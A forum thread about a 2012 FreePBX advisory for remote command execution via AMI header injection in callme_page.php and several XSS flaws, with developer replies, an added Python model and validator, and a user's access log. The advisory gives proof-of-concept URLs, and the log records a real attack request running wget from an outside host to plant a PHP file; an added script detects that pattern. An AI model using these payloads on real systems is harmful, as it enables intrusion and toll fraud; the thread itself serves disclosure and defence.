What's going on with this alleged security exploit in FPBX?

Product: FreePBX
Version: 2.10.0, 2.9.0 and perhaps earlier versions
Type: Remote Command Execution, XSS
Release Date: March 14, 2012
Vendor Notification Date: Jun 12, 2011
Author: Martin Tschirsich
Overview:
A remote command execution vulnerability and some XSS in current and earlier
FreePBX versions due to missing input sanitization.
FreePBX is a popular implementation (500,000 active phone systems) of
Asterisk (telephony software) based around a web-based configuration
interface and other tools. Some of these installations are on a public IP
address.
Proof of Concept:
RCE:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A
XSS (2.9.0 and perhaps other versions):
[HOST]/panel/index_amp.php?context=[XSS]
[HOST]/panel/flash/mypage.php?clid=[XSS]
[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]
[HOST]/panel/dhtml/index.php?context=/…/%00">[XSS]
[HOST]/admin/views/freepbx_reload.php/"[XSS]
[HOST]/recordings/index.php?login='>[XSS]
Details (RCE):
Missing input sanitization in htdocs/recordings/misc/callme_page.php:
// lines 28-30:
$to = $_REQUEST['callmenum']; // vulnerable: taken from the request and never validated
$msgFrom = $_REQUEST['msgFrom'];
$new_path = substr($path, 0, -4);
// line 38:
$call_status = callme_startcall($to, $msgFrom, $new_path); // $to reaches the AMI channel string below
Missing input sanitization in htdocs/recordings/includes/callme.php:
// line 88-117:
function callme_startcall($to, $from, $new_path)
{
    global $astman;
    // vulnerable: $to is embedded verbatim in the channel name; AMI is a
    // line-oriented protocol, so CR/LF inside $to is read as extra headers
    // of the Originate action
    $channel = "Local/$to@from-internal/n";
    $context = "vm-callme";
    $extension = "s";
    $priority = "1";
    $callerid = "VMAIL/$from";
    // $variable is not defined in this excerpt

    /* Arguments to Originate: channel, extension, context, priority,
       timeout, callerid, variable, account, application, data */
    $status = $astman->Originate($channel, $extension, $context,
        $priority, NULL, $callerid, $variable, NULL, NULL, NULL, NULL);

}
Unofficial Patch (RCE, tested with 2.9.0):
Patch htdocs/recordings/modules/callme_page.php:
http://pastebin.com/ZbX50qaZ
Patch htdocs/recordings/modules/voicemail.module:
http://pastebin.com/vv3qczfC
Disclaimer:
The vendor has been contacted and provided with a patch several times since
Jun 12, 2011. Since no intention to address this issue was shown, I felt it
was in the best interest to disclose the vulnerability.
All information in this advisory is provided on an 'as is' basis in the hope
that it will be useful. The author is not responsible for any risks or
occurrences caused by the application of this information.
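As an added illustration (not code from the advisory, from FreePBX or from the author), the following Python models the mechanism the Details section describes: the callmenum value is spliced into the AMI Originate channel string, and because AMI is a CRLF-delimited, line-oriented protocol, any CR/LF inside the value is read by Asterisk as additional headers. It is written in Python rather than PHP so that it runs stand-alone. The allow-list pattern DIAL_STRING, the sample caller ID and all function names are assumptions; the hardened form shows one way the missing check in callme_page.php could be written.

```python
import re
from urllib.parse import unquote

# Assumed policy (not from the advisory): a call-me number is an optional
# leading '+', then digits and the '*'/'#' feature keys, 1..32 characters.
# An allow-list is preferable to stripping CR/LF, because it also rejects
# '/', '@' and other characters that have meaning in an Asterisk channel name.
DIAL_STRING = re.compile(r"^\+?[0-9*#]{1,32}$")


class InvalidCallNumber(ValueError):
    """Raised when callmenum is not a plain dial string."""


def is_valid_callmenum(raw: str) -> bool:
    """True only for a bare dial string; CR/LF and channel syntax fail."""
    return isinstance(raw, str) and DIAL_STRING.fullmatch(raw) is not None


def validate_callmenum(raw: str) -> str:
    """Hardened form of the check callme_page.php lacks: reject, don't strip."""
    if not is_valid_callmenum(raw):
        raise InvalidCallNumber("callmenum must be a dial string")
    return raw


def local_channel(to: str) -> str:
    """Same channel string the vulnerable callme_startcall() builds."""
    return f"Local/{to}@from-internal/n"


def originate_frame(channel: str, callerid: str = "VMAIL/1001") -> str:
    """Serialize the Originate action the way an AMI client sends it:
    one 'Key: Value' header per CRLF line, blank line ends the action."""
    fields = [
        ("Action", "Originate"),
        ("Channel", channel),
        ("Context", "vm-callme"),
        ("Exten", "s"),
        ("Priority", "1"),
        ("CallerID", callerid),
    ]
    return "".join(f"{k}: {v}\r\n" for k, v in fields) + "\r\n"


def ami_header_keys(frame: str) -> list:
    """Parse a frame as the AMI peer does and return the header names seen
    before the first blank line (which terminates the action)."""
    keys = []
    for line in frame.split("\r\n"):
        if line == "":
            break
        name, _, _ = line.partition(":")
        keys.append(name.strip())
    return keys


def keys_for_callmenum(query_value: str, validate: bool) -> list:
    """Decode callmenum as the web server does before it reaches $_REQUEST,
    optionally apply the hardened check, and return the headers Asterisk
    would see in the resulting Originate action."""
    to = unquote(query_value)
    if validate:
        to = validate_callmenum(to)
    return ami_header_keys(originate_frame(local_channel(to)))


if __name__ == "__main__":
    # Constructed inputs: a benign extension and one shaped like the
    # advisory's PoC with the command replaced by a placeholder.
    benign = "1001"
    injected = "1001%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A"
    print(keys_for_callmenum(benign, validate=False))
    print(keys_for_callmenum(injected, validate=False))
    try:
        keys_for_callmenum(injected, validate=True)
    except InvalidCallNumber as exc:
        print("rejected:", exc)
```

With the injected value and no check, the headers Asterisk parses are Action, Channel, Application and Data: the embedded blank line cuts the action short, so the Context, Exten and Priority headers the page intended are never read. With the check in place the request is refused before any AMI traffic is generated.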

I am not sure on the exploit side but will be looking into it, but I can state that I have been on the mailing list for security reports for 2 years now and never received an email from this person. Secondly, if someone found an exploit that long ago, a simple PM or forum post would have had a developer looking at it. Not sure how they were reporting it.

Do you have a link to where you found this?

We also have had a public bug tracker for over 5 years now that someone could report this as a bug and include a patch. Not sure how much more we can make it for people to report things like this to us.

http://www.1337day.com/exploits/17803

Details of those can be found in #5711, #5712 and #5713

The issue in #5711 has the potential of a remote command execution.

On the FreePBX Distro that could result in a command being run as user Asterisk. Because of the security measures taken on the Distro with no sudo root access to the asterisk user, the Distro should be safe from potential root level attacks. On some other Distros that don’t have this protection, they were probably vulnerable to root level attacks. In either case the fixes have all been published.

The XSS vulnerabilities were mostly gone in 2.10 already but in any event, have been fixed as well in prior versions. Details in the tickets.

Philippe, just for clarification: these existed in all versions of FreePBX and you fixed the exploits back to 2.6 and newer, correct?

I guess maybe the person who wrote this up may not have been entirely truthful?

Because of the security measures taken on the Distro with no sudo root access to the asterisk user, the Distro should be safe from potential root level attacks

LOL :wink: The distro is not safe. The root access is not necessary. The web server runs as the same user as asterisk. It has access to all config files and credentials they contain which means FREE CALLS. The box can also be turned into a zombie and become part of a botnet. Root access would not make much difference.

btw: It is quite amazing how old this problem is and how many boxes are going to/have been exploited.

I also think you should not stick your head in the sand this time and create a CVE entry, otherwise it is going to be difficult to take your security efforts seriously.

obelisk,

I don’t think your hostility is very welcome around here, if this were your only comment of this nature I wouldn’t think anything of it, but there have been plenty more.

No one is sticking their head in the sand. The security issue is fixed and applied all the way back to 2.6. We actually don’t support releases prior to 2.9. We are in contact with security firms on most security issues and reports, as we are with this one; they are pretty good at properly publishing and putting such vulnerabilities out.

The comment about root level access vs. web server level access is a simple factual statement. There is plenty of damage that can be done as user asterisk, there is a lot more that can be done and well beyond the “PBX” level at root level. Neither is good, the latter is worse.

Providing access to the server from the outside world without other protection in place is simply naive for anyone to think that there will not continue to be opportunities for exploits, there is nothing more to be said and plenty of threads across the forums that discuss this.

Yes, and it is open source. For someone as security minded as you are, shame on you for being so concerned and vocal about these issues, and not having found and pointed this out a long time ago… Don’t forget, one of the great things about open source is that there is a collective set of eyes and communities to both find and provide fixes and patches for the better of everyone. Although there is a constant and changing “core” set of developers at any given point in time actively engaged in the project, there is a constant and broad set of eyes and contributions from the community, the collective owners of this project that helps constantly better and improve it. I think you’ll find that the community works much better when things are approached in a positive and constructive manner.

GeekyBoy,

It’s not a question of the author being ‘truthful.’

I have worked with many security reporters/firms. They typically come across a vulnerability on a project like FreePBX that they are not even familiar with. They put what information they have out and err on the side of “broadness” if they don’t know specifics. They count on folks like us to provide more details of what exactly is affected.

In the case of this one, the author was very helpful not only in discovering the vulnerability but in helping to vet various solutions to fix the vulnerability which is always very welcome in such situations.

At the end of the day, the details and what is affected are out and available, and we are in communication with a security firm who I expect will be writing up the details that we provided them when they write up a proper security notification.

Thanks for your help on the other thread obelisk. You were the only one who tried to answer my question and that led me to this exploit. Turns out this exploit was my problem. The boxes were updated with the fix long ago but not before the hacker planted a few presents which were only used recently.

Thanks to the FreePBX team for fixing this although it was a bit too late for me in this case. I don’t think this one was something that could have easily been found until after it was exploited.

Cue SkyKing to come in here and take another thread off the rails again.

excuse me,
our PBX has been XSS’ed causing some financial damage

as being a developer myself with over 100 different applications on the open internet I think it is a shame to say: don’t put it on the open internet, and not mention anything in your installers etc. about potential known security issues

your installed base is high, very high, but with this security track record I HIGHLY doubt it will remain that way.

from my POV:
the installer is a menace, still the same old lame stuff as 5 years ago.
documentation is in a bad shape.

good is the UI, but the UI has now created many security holes
if
a highly patched system
using the new modules that are available
gets compromised over the FreePBX interface
then the interface is a real threat

AND SHOULD BE MENTIONED in the installer

Schmooze sticks its head in the sand and behaves like MS did 10 years ago
denial…

Hi there.

The installer has been actively worked on over the past year and now has fixes and support for various distros (wheezy, ubuntu to name a few).

The documentation has been worked on actively as well. Please see: wiki.freepbx.org for more information on that one.

Also, I need to point out that you have replied to a thread that is over a year old. We fixed this a year ago. If you don’t install updates, how are we supposed to help?

Taking jabs at the developers of an opensource project is pretty juvenile, my policy is not to feed the trolls, so if you want responses, grow up.

FreePBX is and continues to be an OPEN SOURCE project; if you have the skills, please contribute.

This is the second old post you have pulled up today. It is an industry given that any PBX needs to be placed behind a secure hardware-based firewall; even proprietary systems such as Cisco, Avaya etc. do not allow access to their PBX GUIs on the net. The fact that you did and had an issue is your issue, not ours. If you are a developer you are welcome to either submit code, submit bug reports, or work on the documentation that you say is lacking. Updated documentation can be found at wiki.freepbx.org; you are also welcome to review the security enhancements we have added to 2.11, which is currently in BETA, as well as the fixes that have been added to 2.10 over the past few years.

Hi everybody:
I have just arrived at this website and forum. I find it very exciting to belong to it and wish to contact anybody who is kind enough to lead me into PBX systems, as I am interested in installing appropriate software on my PC.
Let me thank you in advance, and kind regards,

Rodolfo

I’m not sure I have understood, but I still have this issue on my server: CentOS 6 x64, Asterisk 1.8, FreePBX 2.9 with all modules updated.
Samples of the logs:

[[email protected] ~]# mysql -uroot asterisk -e "select version from modules where modulename = 'fw_ari'"|grep -v version
2.9.0.8
[[email protected] ~]# grep 23.88.165.110 /var/log/httpd/access_log-20130922
23.88.165.110 - - [19/Sep/2013:08:00:10 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:15:15:06 -0400] "GET /recordings/misc/callme_page.php?action=c&[email protected]/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://xmors.org/web.txt%20-O%20/var/www/html/recordings/locale/mg.php%0D%0A%0D%0A HTTP/1.1" 200 1125 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:15:15:06 -0400] "GET /recordings/locale/mg.php HTTP/1.1" 200 137 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:17:51:57 -0400] "GET /recordings/misc/callme_page.php?action=c&[email protected]/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://xmors.org/web.txt%20-O%20/var/www/html/recordings/locale/mg.php%0D%0A%0D%0A HTTP/1.1" 200 1125 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:17:51:57 -0400] "GET /recordings/locale/mg.php HTTP/1.1" 200 - "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
[[email protected] ~]#

Thanks,
Best regards.
Charlie
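An added example, not part of Charlie's post and not FreePBX code, of how an administrator can check an httpd access log for the pattern shown above: it parses Apache combined-format lines, flags callme_page.php requests whose callmenum carries CR/LF or an injected Application: header, and flags any .php served out of /recordings/locale/, which in the log above is where the dropped file landed. The sample lines, addresses, hostnames and file names are constructed placeholders (not the ones from the post), and the rule that no .php file belongs under locale/ is an assumption about a stock install.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in Apache combined log format, shaped like the lines
# quoted in the post above.  Addresses, hostnames and file names are
# documentation/placeholder values.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Sep/2013:08:00:10 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283 "-" "curl/7.15.5"
203.0.113.7 - - [19/Sep/2013:15:15:06 -0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=1001@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://attacker.example/web.txt%20-O%20/var/www/html/recordings/locale/x.php%0D%0A%0D%0A HTTP/1.1" 200 1125 "-" "curl/7.15.5"
203.0.113.7 - - [19/Sep/2013:15:15:06 -0400] "GET /recordings/locale/x.php HTTP/1.1" 200 137 "-" "curl/7.15.5"
198.51.100.4 - - [19/Sep/2013:16:02:41 -0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=1001 HTTP/1.1" 200 1125 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

CALLME_PATH = "/recordings/misc/callme_page.php"
# Assumption: the locale directory of a stock ARI install holds language
# files only, so a .php being served from it is a dropped file.
LOCALE_PREFIX = "/recordings/locale/"


def parse_line(line: str):
    """Split one access-log line into fields; None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def reasons_for(rec: dict) -> list:
    """Return the rule names this request trips, in a fixed order."""
    reasons = []
    if rec["path"] == CALLME_PATH:
        # parse_qs URL-decodes, so %0D%0A in the log becomes "\r\n" here,
        # exactly what callme_page.php received in $_REQUEST['callmenum'].
        params = parse_qs(rec["query"], keep_blank_values=True)
        value = " ".join(params.get("callmenum", []))
        if "\r" in value or "\n" in value:
            reasons.append("crlf-in-callmenum")
        if re.search(r"(?im)^application:", value):
            reasons.append("ami-application-header")
    if rec["path"].startswith(LOCALE_PREFIX) and rec["path"].lower().endswith(".php"):
        reasons.append("php-under-locale")
    return reasons


def scan(log_text: str) -> list:
    """Run every line through the rules and collect the hits."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = reasons_for(rec)
        if reasons:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["path"],
                "status": int(rec["status"]),
                "reasons": reasons,
            })
    return findings


def suspicious_ips(findings: list) -> list:
    """Distinct source addresses behind the findings, sorted."""
    return sorted({f["ip"] for f in findings})


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], f["path"], ",".join(f["reasons"]))
    print("sources:", suspicious_ips(scan(SAMPLE_LOG)))
```

A 200 on the callme_page.php request says nothing about whether the Originate went through, which is the point made in the reply below that being hit is not the same as being compromised. The stronger signal is the one the log above also shows: a second request for a .php file that did not exist before, answered with 200. If that pattern appears, the file and any credentials it could read should be treated as exposed, independent of whether fw_ari has since been updated.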

Whilst you are getting hit with the attack, that doesn’t mean they are succeeding. People try to brute-force their way into systems all day long with exploits 7 years old or more against various software daily.

Hello,
This server has been hacked for $170; they have successfully “injected” and run a script and got an extension credential…

Best regards.
Charlie

Charlie,
Please ensure that you have updated the FreePBX ARI Framework module as looking through our issue tracker I show that we published a fix for this vulnerability back in 2012 when it was brought to our attention.

Also you may or may not know that the current stable release of FreePBX is 2.11, and may wish to upgrade your 2.9 system to a more current release.

Hello Bryan,

Thank you for your response. I’m happy with the “simplicity” of FreePBX 2.9; that’s the reason why I did not upgrade to 2.10 and up. On the other hand, I have a lot of FreePBX 2.9 based servers in production, and from what I read, ARI module version 2.9.0.8 is the latest; please correct me if I’m wrong.

Thanks again,
Best regards.
Charlie

We’ve confirmed that the bug fix we implemented in FreePBX 2.6 through 2.11 protects against the attack vectors you mentioned, using the information you provided. If you are still seeing the vulnerability, it appears something must not be updated on your system. We suggest you do a clean install if you cannot determine what’s wrong with your system, or contact our support department (please note that support is a paid product should you decide to go that route).